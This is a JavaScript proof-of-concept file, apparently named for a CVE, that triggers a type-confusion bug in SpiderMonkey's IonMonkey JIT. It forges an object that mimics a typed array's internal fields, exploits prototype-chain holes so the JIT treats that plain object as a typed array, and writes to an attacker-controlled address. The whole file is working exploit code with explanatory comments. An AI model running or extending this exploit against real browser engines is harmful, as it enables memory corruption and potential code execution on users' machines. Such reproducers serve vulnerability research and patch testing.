cve_2.js
// Run with --no-threads for increased reliability
// Crash reproducer for an IonMonkey (SpiderMonkey JIT) type-inference bug: the
// script below makes the JIT believe an array element is always an object and
// then hands it a plain object instead (see v7 and the prototype setup that
// follows). The values here are only meaningful against the engine build the
// author tested; nothing in this file identifies that build.
let ab = new ArrayBuffer(0x1000);
// Plain object whose property names mirror a typed array's internal fields
// (buffer/length/byteOffset/data). The doubles are presumably chosen so the
// object's raw layout resembles a typed array -- that cannot be verified from
// this file alone.
let x = {buffer: ab, length: 13.39, byteOffset: 13.40, data: 1.1588927404741e-310};
//let x = {buffer: ab, length: 13.39, byteOffset: 13.40, data: 1.222269575596e-310};
// The commented-out line above is an alternative `data` value kept by the
// author, presumably for a different engine build (unverified).
let y = new Uint32Array(0x1000);
// Backing array of genuine typed arrays: every element is a real object, which
// is the type the JIT will infer for v4.pop() in v7.
const v4 = [y, y, y, y, y];
/**
 * Hot function that the caller loop drives until IonMonkey compiles it.
 *
 * The parameters v8 and v9 are never read (the call site invokes v7() with no
 * arguments); they are kept only so the signature matches the original.
 *
 * Each call pops one element from v4 and writes to index 0 of the result.
 * While v4 still holds its original Uint32Array elements the write is an
 * ordinary typed-array store. Once v4 has been drained, the refill below
 * assigns only index 3, leaving holes at indices 0-2; subsequent pop() calls
 * then resolve those holes through v4's prototype chain (v4 -> p -> [y, y, y]),
 * and index 0 resolves to p[0], which is the plain object x. The JIT-compiled
 * code, having inferred "always a typed array", performs the store on x as if
 * it were one -- that is the crash the file demonstrates.
 *
 * No return value.
 */
function v7(v8,v9) {
//console.log("In Func.")
// Refill only when the array is empty; note that only index 3 is set, so
// indices 0-2 become holes rather than elements.
if (v4.length == 0) {
v4[3] = y;
}
// pop the last value. IonMonkey will, based on inferred types, conclude that the result
// will always be an object, which is untrue when p[0] is fetched here.
const v11 = v4.pop();
// It will then crash here when writing to a controlled address (0x168000000000).
v11[0] = 0x1337;
// Force JIT compilation.
// Empty loop whose only purpose is to raise the function's warm-up counter so
// the engine tiers it up to Ion.
for (let v15 = 0; v15 < 10000; v15++) {}
}
// Prototype chain used to smuggle the plain object x into v4's element lookup:
//   v4 -> p -> [y, y, y]
// p[0] is x (a plain object); p[1] and p[2] fall through to the inner array
// and resolve to y (a real Uint32Array). Holes in v4 are therefore filled with
// typed arrays except at index 0.
var p = {};
p.__proto__ = [y, y, y];
p[0] = x;
v4.__proto__ = p;
console.log("Starting Exploit.")
// previously 1000
// Drive v7 enough times to (a) drain the five original elements of v4, (b) get
// v7 compiled by IonMonkey, and (c) reach the pop() that yields x. The exact
// iteration count needed depends on the engine's tier-up thresholds; the
// author notes the value was already 1000 before.
for (let v31 = 0; v31 < 1000; v31++) {
v7();
}
// Only reached if the engine under test is not affected (or the JIT did not
// tier up); on a vulnerable build the process terminates inside v7 first.
console.log("Ending Exploit.")